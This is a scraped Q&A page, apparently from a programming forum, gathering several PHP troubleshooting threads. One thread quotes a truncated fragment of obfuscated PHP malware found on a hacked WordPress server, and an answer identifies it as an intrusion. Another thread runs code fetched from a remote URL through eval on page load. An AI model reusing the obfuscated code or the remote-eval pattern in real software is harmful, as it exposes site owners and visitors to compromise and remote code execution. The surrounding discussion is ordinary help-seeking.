I'm trying to get a page from github to be read and executed with PHP upon page load due to it updating often, although while I've managed to format the page to what should be correct, it still doesn't seem to work.
Basically, I've used the file_get_contents to grab all of the information on the page (if I get this working it should potentially work with any page), removed all comments, and now I just need the code to run.
I've heard eval is unsafe, but it's only a personal website and I trust the github page isn't going to use malicious code, but I'm getting a "syntax error, unexpected T_CONSTANT_ENCAPSED_STRING", when the page runs, despite the fact I haven't touched the code and it runs fine if copied and pasted.
Here is the code I've used to remove the comments, I can't see any problem on or around line 391 where it says the error is, http://www.compileonline.com/execute_php_online.php works if you copy and paste it in
#get page data, remove intro comment (unefficient but can be rewritten once working)
$browsercoderaw = explode("*/",file_get_contents("https://raw.githubusercontent.com/cbschuld/Browser.php/master/lib/Browser.php"));
for($i==1;$i<count($browsercoderaw);$i++){
if($i>1){$browsercodejoined.=" */";} # replace */ for other comments so they can be removed later
$browsercodejoined.=$browsercoderaw[$i];}
$browsercode = nl2br(str_replace("?>","",$browsercodejoined));
#remove all /* comments
$commentremove = explode("/*",$browsercode);
$browsercode2 = $commentremove[0];
for($j==1;$j<count($commentremove);$j++){
$commentsplit = explode("*/",$commentremove[$j]);
$browsercode2.=$commentsplit[1];
}
#remove all // comments
$commentremove2 = explode("<br />",$browsercode2);
$browsercode3 = $commentremove2[0];
$linenum = 0;
for($k==1;$k<count($commentremove2);$k++){
$commentsplit = explode("//",$commentremove2[$k]);
if(strlen(trim($commentsplit[0]))>0){
$browsercode3.=$commentsplit[0];
$browsercodereadable.=$linenum.". ".$commentsplit[0]."<br>";
$linenum++;
}
}
echo $browsercodereadable;
eval($browsercode3);
?>
Also, if there is a better way of doing this please say so, I tried include but the webhost doesn't allow fetching urls from other domains. To be fair, I'm not entirely sure if it's the correct use of eval, but it sounds like it should potentially work.
Related
Sorry if this is the wrong site to post on.
Basically, I have a server and this file keeps creating itself. The file is a PHP file and contains code:
<?php
$GLOBALS['XfZi37Vc'] = $_SERVER;
function ruexxCV1QobH($uiBP25)
{$MISwZvode = "";global $PYJ9QSAA;
for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
{$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;
${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3##G9CJJ");
${YkT1GO68Y3rXB(",g0##&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
${fW1u5W74("gh\"Co[")} = lpkBre6("*77#0>A-DE6#6C9;");
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");
I have never seen code like this before. Can anyone tell me what it is exactly doing?
This is a hack that happened to your Wordpress. Probably because you are using an outdated third party plugin. These can be somewhat difficult to detect, but the code is probably being used to place ads, or redirect your users to outside content or malware.
You should remove this code and update all your plugins.
Keep in mind that this code could have also injected code into your Wordpress database. Especially if you have a plugin that enables 'eval' in Wordpress, meaning code could be retrieved from the database and eval'd.
If that doesn't solve the problem, you should start disabling third party plugins until you find the root of the problem.
Wordpress is VERY easy for automated scripts to detect and third party plugins could have been written by someone who does not know anything about security. You need to be very wary when using them, even if they come from Wordpress.org.
I bought this extension for Joomla called JomDirectory and I'm very happy with it. It works fine in Joomla, and it does what I was expecting it to do. The problem comes when I wanted to start personalising more my website than what I can do with Joomla Backend access. I want to work and develop locally, I already have downloaded Eclipse and my full site and configured pretty much everything (I hope). The whole site is accessible through localhost with any problem except the JomDirectory page. It appears completely blank and I can't see any error or message. When I try to inspect the source code it's also completely empty, without even the opening <html> tag. There's nothing.
Any clue what can this be?
I've been searching a bit more... What I found now is where the program stops: This is the file .../legacy.php. The line 211 is the one starting with $result. Never gets back, so never executes the echo $result and that's why I get a blank page, not a PHP error.
public function display($tpl = null)
{
$result = $this->loadTemplate($tpl);
if ($result instanceof Exception)
{
return $result;
}
echo $result;
}
Expressionengine is showing garbage value when I am using php for Json encode its showing this content {!-- ra:0000000019930c5000007efd6bf7e0f5 --}
here is my code :-
<?php
$entries = array();
{exp:channel:entries channel="sport" category="3536|1830|4102" site="default_site" limit="3" track_views="one" dynamic="no" status="open|featured" disable="categories|category_fields|pagination|member_data" terminate="yes"}
$entries[] = array('title' => '{title}');
{/exp:channel:entries}
header('Content-type: application/json');
echo json_encode($entries);
exit;
?>
If you see this kind of garbage value on the page that means the page has an error.
We mostly find this garbage value on PHP-enabled templates. So if we resolve the PHP errors the garbage will go.
Do not modify the ExpressionEngine core files. If you want to see the PHP errors on the page, turn on the debug mode.
If you remove the exit() function, you will get the output as you want.
The exit() function also exits the execution of ExpressionEngine code that's why you are getting the garbage value.
Even simpler - remove the exit().
As this answer explains, these are annotation tags used for debugging (so you can get a stack trace for nested templates I suppose) and they are parsed out late in the process. So if you exit() it doesn't work. Just make sure that the script ends with no unwanted output and you should be good. I had this problem (in EEv5) and this was the fix.
I've just had the same style of error codes appear, when moving an old EE 2.9.3 site to a Dev server and applying a test domain name.
There were some PHP Includes in the templates, which referenced the live site's server path. When I changed these... all fixed.
For example:
include("/home/sites/domainname.co.uk/public_html/swift/swift_required.php");
...changed to...
include("/home/domain/public_html/swift/swift_required.php");
Yeah ! finally I got the answer its so simple here is the solution :-
go to ExpressionEngine\system\EllisLab\ExpressionEngine\Library\Template\Annotation\Runtime.php
on line no. 65 comment the code return '{!-- ra:'.$key.' --}';
i am trying to test if my script is loaded on a given website and if the script is actually working without any errors onload (later on i will have to do the same for onclick)
So far i have
$testResult = array();
$homepage = 'http://www.example.dk/';
$data = file_get_contents($homepage);
if (strpos($data,'example_script.js'))
{
$testResult['scriptLoaded'] = true;
print_r("win");
}else{
$testResult['scriptLoaded'] = false;
}
Now this loads the page and checks if the javascript is on the page. But how can i read from the console to check if there is any errors while loading the script?
Also is this the right way to check if the script is on the page? The only restriction i have is that i HAVE to use PHP.
The only thing you can check with your code is weather or not somewhere in the code/contents you've gotten from the given url, there is a string example_script.js. If you were to use the url to this page, you'd get true and "win", too, because the substring will be found.
The JS might be riddled with fauklts, but since PHP doesn't understand Js, you won't be able to see that.
If you want to test your site, without a browser, the only thing I can think of is using phantomjs:
Which can be found Here
Using PHP alone, you might be able to do a couple of checks using scriptable browser, cUrl, and the DOMDocument class (to parse and validate the markup).
I apologize if this has been answered, but I haven't been able to find anything about it. I've been having trouble with a certain block of PHP code on my server and have finally realized that it doesn't like single line comments. With this code, the method get_all_articles is never called.
<?php
$article_class = new Articles();
// Fetch all articles
$articles = $article_class->get_all_articles();
?>
However, removing the comment or converting it to a block comment allows the page to render perfectly. I realize that I've already figured out what's causing the problem, but what I'm looking for is why or how I might be able to fix it. Any help would be greatly appreciated. Thanks!
Maybe the formatting is getting lost on upload to where line breaks are being deleted? Try downloading the PHP file after you've uploaded it and see if the line breaks are still intact.
This can be frustrating... One time I had an if statement that would ALWAYS execute, no matter what the values were...
Started out as this, where $x was equal to 5 (I verified this with debugging)
if($x > 10);
{
....
}
Eventually, I had it down to this:
if(false);
{
echo("This should never happen");
echo("but it does!!!!!!!");
}
After much loss of hair, I realized that I had a semi-colon at the end of the if() line, therefore translating into:
if(false)
/*do nothing*/;
{
//Nice block that always executes
}
The moral of this story is that while the problem you percieve is actually giving you a problem, it is not a PHP problem. Try to find out the root cause by first verifying that the actual code that is executing is EXACTLY what you typed. Re-download the file, publish with different protocol, publish as binary, check sha1sum() on files to make sure the same... Look and look and you will find it.
Let us know.